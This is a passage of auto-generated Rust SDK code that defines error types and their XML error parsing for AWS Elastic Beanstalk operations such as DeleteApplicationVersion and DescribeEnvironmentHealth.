S3SubscriptionRequired(String), ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl CreateStorageLocationError { pub fn from_body(body: &str) -> CreateStorageLocationError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => CreateStorageLocationError::InsufficientPrivileges(String::from(parsed_error.message)),"S3SubscriptionRequiredException" => CreateStorageLocationError::S3SubscriptionRequired(String::from(parsed_error.message)),"TooManyBucketsException" => CreateStorageLocationError::TooManyBuckets(String::from(parsed_error.message)),_ => CreateStorageLocationError::Unknown(String::from(body)) } }, Err(_) => CreateStorageLocationError::Unknown(body.to_string()) } } } impl From<XmlParseError> for CreateStorageLocationError { fn from(err: XmlParseError) -> CreateStorageLocationError { let XmlParseError(message) = err; CreateStorageLocationError::Unknown(message.to_string()) } } impl From<CredentialsError> for CreateStorageLocationError { fn from(err: CredentialsError) -> CreateStorageLocationError { CreateStorageLocationError::Credentials(err) } } impl From<HttpDispatchError> for CreateStorageLocationError { fn from(err: HttpDispatchError) -> CreateStorageLocationError { CreateStorageLocationError::HttpDispatch(err) } } impl fmt::Display for CreateStorageLocationError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for CreateStorageLocationError { fn description(&self) -> &str { match *self { CreateStorageLocationError::InsufficientPrivileges(ref cause) => cause, CreateStorageLocationError::S3SubscriptionRequired(ref cause) => cause, CreateStorageLocationError::TooManyBuckets(ref cause) => cause, CreateStorageLocationError::Validation(ref cause) => cause, CreateStorageLocationError::Credentials(ref err) => err.description(), CreateStorageLocationError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), CreateStorageLocationError::Unknown(ref cause) => cause } } } /// Errors returned by DeleteApplication #[derive(Debug, PartialEq)] pub enum DeleteApplicationError { ///<p>Unable to perform the specified operation because another operation that effects an element in this activity is already in progress.</p> OperationInProgress(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DeleteApplicationError { pub fn from_body(body: &str) -> DeleteApplicationError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "OperationInProgressException" => DeleteApplicationError::OperationInProgress(String::from(parsed_error.message)),_ => DeleteApplicationError::Unknown(String::from(body)) } }, Err(_) => DeleteApplicationError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DeleteApplicationError { fn from(err: XmlParseError) -> DeleteApplicationError { let XmlParseError(message) = err; DeleteApplicationError::Unknown(message.to_string()) } } impl From<CredentialsError> for DeleteApplicationError { fn from(err: CredentialsError) -> DeleteApplicationError { DeleteApplicationError::Credentials(err) } } impl From<HttpDispatchError> for DeleteApplicationError { fn from(err: HttpDispatchError) -> DeleteApplicationError { DeleteApplicationError::HttpDispatch(err) } } impl fmt::Display for DeleteApplicationError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DeleteApplicationError { fn description(&self) -> &str { match *self { DeleteApplicationError::OperationInProgress(ref cause) => cause, DeleteApplicationError::Validation(ref cause) => cause, DeleteApplicationError::Credentials(ref err) => err.description(), DeleteApplicationError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DeleteApplicationError::Unknown(ref cause) => cause } } } /// Errors returned by DeleteApplicationVersion #[derive(Debug, PartialEq)] pub enum DeleteApplicationVersionError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>Unable to perform the specified operation because another operation that effects an element in this activity is already in progress.</p> OperationInProgress(String), ///<p>The specified S3 bucket does not belong to the S3 region in which the service is running. The following regions are supported:</p> <ul> <li> <p>IAD/us-east-1</p> </li> <li> <p>PDX/us-west-2</p> </li> <li> <p>DUB/eu-west-1</p> </li> </ul> S3LocationNotInServiceRegion(String), ///<p>Unable to delete the Amazon S3 source bundle associated with the application version. The application version was deleted successfully.</p> SourceBundleDeletion(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DeleteApplicationVersionError { pub fn from_body(body: &str) -> DeleteApplicationVersionError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => DeleteApplicationVersionError::InsufficientPrivileges(String::from(parsed_error.message)),"OperationInProgressException" => DeleteApplicationVersionError::OperationInProgress(String::from(parsed_error.message)),"S3LocationNotInServiceRegionException" => DeleteApplicationVersionError::S3LocationNotInServiceRegion(String::from(parsed_error.message)),"SourceBundleDeletionException" => DeleteApplicationVersionError::SourceBundleDeletion(String::from(parsed_error.message)),_ => DeleteApplicationVersionError::Unknown(String::from(body)) } }, Err(_) => DeleteApplicationVersionError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DeleteApplicationVersionError { fn from(err: XmlParseError) -> DeleteApplicationVersionError { let XmlParseError(message) = err; DeleteApplicationVersionError::Unknown(message.to_string()) } } impl From<CredentialsError> for DeleteApplicationVersionError { fn from(err: CredentialsError) -> DeleteApplicationVersionError { DeleteApplicationVersionError::Credentials(err) } } impl From<HttpDispatchError> for DeleteApplicationVersionError { fn from(err: HttpDispatchError) -> DeleteApplicationVersionError { DeleteApplicationVersionError::HttpDispatch(err) } } impl fmt::Display for DeleteApplicationVersionError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DeleteApplicationVersionError { fn description(&self) -> &str { match *self { DeleteApplicationVersionError::InsufficientPrivileges(ref cause) => cause, DeleteApplicationVersionError::OperationInProgress(ref cause) => cause, DeleteApplicationVersionError::S3LocationNotInServiceRegion(ref cause) => cause, DeleteApplicationVersionError::SourceBundleDeletion(ref cause) => cause, DeleteApplicationVersionError::Validation(ref cause) => cause, DeleteApplicationVersionError::Credentials(ref err) => err.description(), DeleteApplicationVersionError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DeleteApplicationVersionError::Unknown(ref cause) => cause } } } /// Errors returned by DeleteConfigurationTemplate #[derive(Debug, PartialEq)] pub enum DeleteConfigurationTemplateError { ///<p>Unable to perform the specified operation because another operation that effects an element in this activity is already in progress.</p> OperationInProgress(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DeleteConfigurationTemplateError { pub fn from_body(body: &str) -> DeleteConfigurationTemplateError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "OperationInProgressException" => DeleteConfigurationTemplateError::OperationInProgress(String::from(parsed_error.message)),_ => DeleteConfigurationTemplateError::Unknown(String::from(body)) } }, Err(_) => DeleteConfigurationTemplateError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DeleteConfigurationTemplateError { fn from(err: XmlParseError) -> DeleteConfigurationTemplateError { let XmlParseError(message) = err; DeleteConfigurationTemplateError::Unknown(message.to_string()) } } impl From<CredentialsError> for DeleteConfigurationTemplateError { fn from(err: CredentialsError) -> DeleteConfigurationTemplateError { DeleteConfigurationTemplateError::Credentials(err) } } impl From<HttpDispatchError> for DeleteConfigurationTemplateError { fn from(err: HttpDispatchError) -> DeleteConfigurationTemplateError { DeleteConfigurationTemplateError::HttpDispatch(err) } } impl fmt::Display for DeleteConfigurationTemplateError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DeleteConfigurationTemplateError { fn description(&self) -> &str { match *self { DeleteConfigurationTemplateError::OperationInProgress(ref cause) => cause, DeleteConfigurationTemplateError::Validation(ref cause) => cause, DeleteConfigurationTemplateError::Credentials(ref err) => err.description(), DeleteConfigurationTemplateError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DeleteConfigurationTemplateError::Unknown(ref cause) => cause } } } /// Errors returned by DeleteEnvironmentConfiguration #[derive(Debug, PartialEq)] pub enum DeleteEnvironmentConfigurationError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DeleteEnvironmentConfigurationError { pub fn from_body(body: &str) -> DeleteEnvironmentConfigurationError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => DeleteEnvironmentConfigurationError::Unknown(String::from(body)) } }, Err(_) => DeleteEnvironmentConfigurationError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DeleteEnvironmentConfigurationError { fn from(err: XmlParseError) -> DeleteEnvironmentConfigurationError { let XmlParseError(message) = err; DeleteEnvironmentConfigurationError::Unknown(message.to_string()) } } impl From<CredentialsError> for DeleteEnvironmentConfigurationError { fn from(err: CredentialsError) -> DeleteEnvironmentConfigurationError { DeleteEnvironmentConfigurationError::Credentials(err) } } impl From<HttpDispatchError> for DeleteEnvironmentConfigurationError { fn from(err: HttpDispatchError) -> DeleteEnvironmentConfigurationError { DeleteEnvironmentConfigurationError::HttpDispatch(err) } } impl fmt::Display for DeleteEnvironmentConfigurationError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DeleteEnvironmentConfigurationError { fn description(&self) -> &str { match *self { DeleteEnvironmentConfigurationError::Validation(ref cause) => cause, DeleteEnvironmentConfigurationError::Credentials(ref err) => err.description(), DeleteEnvironmentConfigurationError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DeleteEnvironmentConfigurationError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeApplicationVersions #[derive(Debug, PartialEq)] pub enum DescribeApplicationVersionsError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeApplicationVersionsError { pub fn from_body(body: &str) -> DescribeApplicationVersionsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => DescribeApplicationVersionsError::Unknown(String::from(body)) } }, Err(_) => DescribeApplicationVersionsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeApplicationVersionsError { fn from(err: XmlParseError) -> DescribeApplicationVersionsError { let XmlParseError(message) = err; DescribeApplicationVersionsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeApplicationVersionsError { fn from(err: CredentialsError) -> DescribeApplicationVersionsError { DescribeApplicationVersionsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeApplicationVersionsError { fn from(err: HttpDispatchError) -> DescribeApplicationVersionsError { DescribeApplicationVersionsError::HttpDispatch(err) } } impl fmt::Display for DescribeApplicationVersionsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeApplicationVersionsError { fn description(&self) -> &str { match *self { DescribeApplicationVersionsError::Validation(ref cause) => cause, DescribeApplicationVersionsError::Credentials(ref err) => err.description(), DescribeApplicationVersionsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeApplicationVersionsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeApplications #[derive(Debug, PartialEq)] pub enum DescribeApplicationsError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeApplicationsError { pub fn from_body(body: &str) -> DescribeApplicationsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => DescribeApplicationsError::Unknown(String::from(body)) } }, Err(_) => DescribeApplicationsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeApplicationsError { fn from(err: XmlParseError) -> DescribeApplicationsError { let XmlParseError(message) = err; DescribeApplicationsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeApplicationsError { fn from(err: CredentialsError) -> DescribeApplicationsError { DescribeApplicationsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeApplicationsError { fn from(err: HttpDispatchError) -> DescribeApplicationsError { DescribeApplicationsError::HttpDispatch(err) } } impl fmt::Display for DescribeApplicationsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeApplicationsError { fn description(&self) -> &str { match *self { DescribeApplicationsError::Validation(ref cause) => cause, DescribeApplicationsError::Credentials(ref err) => err.description(), DescribeApplicationsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeApplicationsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeConfigurationOptions #[derive(Debug, PartialEq)] pub enum DescribeConfigurationOptionsError { ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeConfigurationOptionsError { pub fn from_body(body: &str) -> DescribeConfigurationOptionsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "TooManyBucketsException" => DescribeConfigurationOptionsError::TooManyBuckets(String::from(parsed_error.message)),_ => DescribeConfigurationOptionsError::Unknown(String::from(body)) } }, Err(_) => DescribeConfigurationOptionsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeConfigurationOptionsError { fn from(err: XmlParseError) -> DescribeConfigurationOptionsError { let XmlParseError(message) = err; DescribeConfigurationOptionsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeConfigurationOptionsError { fn from(err: CredentialsError) -> DescribeConfigurationOptionsError { DescribeConfigurationOptionsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeConfigurationOptionsError { fn from(err: HttpDispatchError) -> DescribeConfigurationOptionsError { DescribeConfigurationOptionsError::HttpDispatch(err) } } impl fmt::Display for DescribeConfigurationOptionsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeConfigurationOptionsError { fn description(&self) -> &str { match *self { DescribeConfigurationOptionsError::TooManyBuckets(ref cause) => cause, DescribeConfigurationOptionsError::Validation(ref cause) => cause, DescribeConfigurationOptionsError::Credentials(ref err) => err.description(), DescribeConfigurationOptionsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeConfigurationOptionsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeConfigurationSettings #[derive(Debug, PartialEq)] pub enum DescribeConfigurationSettingsError { ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeConfigurationSettingsError { pub fn from_body(body: &str) -> DescribeConfigurationSettingsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "TooManyBucketsException" => DescribeConfigurationSettingsError::TooManyBuckets(String::from(parsed_error.message)),_ => DescribeConfigurationSettingsError::Unknown(String::from(body)) } }, Err(_) => DescribeConfigurationSettingsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeConfigurationSettingsError { fn from(err: XmlParseError) -> DescribeConfigurationSettingsError { let XmlParseError(message) = err; DescribeConfigurationSettingsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeConfigurationSettingsError { fn from(err: CredentialsError) -> DescribeConfigurationSettingsError { DescribeConfigurationSettingsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeConfigurationSettingsError { fn from(err: HttpDispatchError) -> DescribeConfigurationSettingsError { DescribeConfigurationSettingsError::HttpDispatch(err) } } impl fmt::Display for DescribeConfigurationSettingsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeConfigurationSettingsError { fn description(&self) -> &str { match *self { DescribeConfigurationSettingsError::TooManyBuckets(ref cause) => cause, DescribeConfigurationSettingsError::Validation(ref cause) => cause, DescribeConfigurationSettingsError::Credentials(ref err) => err.description(), DescribeConfigurationSettingsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeConfigurationSettingsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEnvironmentHealth #[derive(Debug, PartialEq)] pub enum DescribeEnvironmentHealthError { ///<p>A generic service exception has occurred.</p> ElasticBeanstalkService(String), ///<p>One or more input parameters is not valid. Please correct the input parameters and try the operation again.</p> InvalidRequest(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeEnvironmentHealthError { pub fn from_body(body: &str) -> DescribeEnvironmentHealthError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "ElasticBeanstalkServiceException" => DescribeEnvironmentHealthError::ElasticBeanstalkService(String::from(parsed_error.message)),"InvalidRequestException" => DescribeEnvironmentHealthError::InvalidRequest(String::from(parsed_error.message)),_ => DescribeEnvironmentHealthError::Unknown(String::from(body)) } }, Err(_) => DescribeEnvironmentHealthError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEnvironmentHealthError { fn from(err: XmlParseError) -> DescribeEnvironmentHealthError { let XmlParseError(message) = err; DescribeEnvironmentHealthError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEnvironmentHealthError { fn from(err: CredentialsError) -> DescribeEnvironmentHealthError { DescribeEnvironmentHealthError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEnvironmentHealthError { fn from(err: HttpDispatchError) -> DescribeEnvironmentHealthError { DescribeEnvironmentHealthError::HttpDispatch(err) } } impl fmt::Display for DescribeEnvironmentHealthError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEnvironmentHealthError { fn description(&self) -> &str { match *self { DescribeEnvironmentHealthError::ElasticBeanstalkService(ref cause) => cause, DescribeEnvironmentHealthError::InvalidRequest(ref cause) => cause, DescribeEnvironmentHealthError::Validation(ref cause) => cause, DescribeEnvironmentHealthError::Credentials(ref err) => err.description(), DescribeEnvironmentHealthError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEnvironmentHealthError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEnvironmentManagedActionHistory #[derive(Debug, PartialEq)] pub enum DescribeEnvironmentManagedActionHistoryError { ///<p>A generic service exception has occurred.</p> ElasticBeanstalkService(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeEnvironmentManagedActionHistoryError { pub fn from_body(body: &str) -> DescribeEnvironmentManagedActionHistoryError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "ElasticBeanstalkServiceException" => DescribeEnvironmentManagedActionHistoryError::ElasticBeanstalkService(String::from(parsed_error.message)),_ => DescribeEnvironmentManagedActionHistoryError::Unknown(String::from(body)) } }, Err(_) => DescribeEnvironmentManagedActionHistoryError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEnvironmentManagedActionHistoryError { fn from(err: XmlParseError) -> DescribeEnvironmentManagedActionHistoryError { let XmlParseError(message) = err; DescribeEnvironmentManagedActionHistoryError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEnvironmentManagedActionHistoryError { fn from(err: CredentialsError) -> DescribeEnvironmentManagedActionHistoryError { DescribeEnvironmentManagedActionHistoryError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEnvironmentManagedActionHistoryError { fn from(err: HttpDispatchError) -> DescribeEnvironmentManagedActionHistoryError { DescribeEnvironmentManagedActionHistoryError::HttpDispatch(err) } } impl fmt::Display for DescribeEnvironmentManagedActionHistoryError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEnvironmentManagedActionHistoryError { fn description(&self) -> &str { match *self { DescribeEnvironmentManagedActionHistoryError::ElasticBeanstalkService(ref cause) => cause, DescribeEnvironmentManagedActionHistoryError::Validation(ref cause) => cause, DescribeEnvironmentManagedActionHistoryError::Credentials(ref err) => err.description(), DescribeEnvironmentManagedActionHistoryError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEnvironmentManagedActionHistoryError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEnvironmentManagedActions #[derive(Debug, PartialEq)] pub enum DescribeEnvironmentManagedActionsError { ///<p>A generic service exception has occurred.</p> ElasticBeanstalkService(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeEnvironmentManagedActionsError { pub fn from_body(body: &str) -> DescribeEnvironmentManagedActionsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "ElasticBeanstalkServiceException" => DescribeEnvironmentManagedActionsError::ElasticBeanstalkService(String::from(parsed_error.message)),_ => DescribeEnvironmentManagedActionsError::Unknown(String::from(body)) } }, Err(_) => DescribeEnvironmentManagedActionsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEnvironmentManagedActionsError { fn from(err: XmlParseError) -> DescribeEnvironmentManagedActionsError { let XmlParseError(message) = err; DescribeEnvironmentManagedActionsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEnvironmentManagedActionsError { fn from(err: CredentialsError) -> DescribeEnvironmentManagedActionsError { DescribeEnvironmentManagedActionsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEnvironmentManagedActionsError { fn from(err: HttpDispatchError) -> DescribeEnvironmentManagedActionsError { DescribeEnvironmentManagedActionsError::HttpDispatch(err) } } impl fmt::Display for DescribeEnvironmentManagedActionsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEnvironmentManagedActionsError { fn description(&self) -> &str { match *self { DescribeEnvironmentManagedActionsError::ElasticBeanstalkService(ref cause) => cause, DescribeEnvironmentManagedActionsError::Validation(ref cause) => cause, DescribeEnvironmentManagedActionsError::Credentials(ref err) => err.description(), DescribeEnvironmentManagedActionsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEnvironmentManagedActionsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEnvironmentResources #[derive(Debug, PartialEq)] pub enum DescribeEnvironmentResourcesError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeEnvironmentResourcesError { pub fn from_body(body: &str) -> DescribeEnvironmentResourcesError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => DescribeEnvironmentResourcesError::InsufficientPrivileges(String::from(parsed_error.message)),_ => DescribeEnvironmentResourcesError::Unknown(String::from(body)) } }, Err(_) => DescribeEnvironmentResourcesError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEnvironmentResourcesError { fn from(err: XmlParseError) -> DescribeEnvironmentResourcesError { let XmlParseError(message) = err; DescribeEnvironmentResourcesError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEnvironmentResourcesError { fn from(err: CredentialsError) -> DescribeEnvironmentResourcesError { DescribeEnvironmentResourcesError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEnvironmentResourcesError { fn from(err: HttpDispatchError) -> DescribeEnvironmentResourcesError { DescribeEnvironmentResourcesError::HttpDispatch(err) } } impl fmt::Display for DescribeEnvironmentResourcesError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEnvironmentResourcesError { fn description(&self) -> &str { match *self { DescribeEnvironmentResourcesError::InsufficientPrivileges(ref cause) => cause, DescribeEnvironmentResourcesError::Validation(ref cause) => cause, DescribeEnvironmentResourcesError::Credentials(ref err) => err.description(), DescribeEnvironmentResourcesError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEnvironmentResourcesError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEnvironments #[derive(Debug, PartialEq)] pub enum DescribeEnvironmentsError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeEnvironmentsError { pub fn from_body(body: &str) -> DescribeEnvironmentsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => DescribeEnvironmentsError::Unknown(String::from(body)) } }, Err(_) => DescribeEnvironmentsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEnvironmentsError { fn from(err: XmlParseError) -> DescribeEnvironmentsError { let XmlParseError(message) = err; DescribeEnvironmentsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEnvironmentsError { fn from(err: CredentialsError) -> DescribeEnvironmentsError { DescribeEnvironmentsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEnvironmentsError { fn from(err: HttpDispatchError) -> DescribeEnvironmentsError { DescribeEnvironmentsError::HttpDispatch(err) } } impl fmt::Display for DescribeEnvironmentsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEnvironmentsError { fn description(&self) -> &str { match *self { DescribeEnvironmentsError::Validation(ref cause) => cause, DescribeEnvironmentsError::Credentials(ref err) => err.description(), DescribeEnvironmentsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEnvironmentsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeEvents #[derive(Debug, PartialEq)] pub enum DescribeEventsError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. 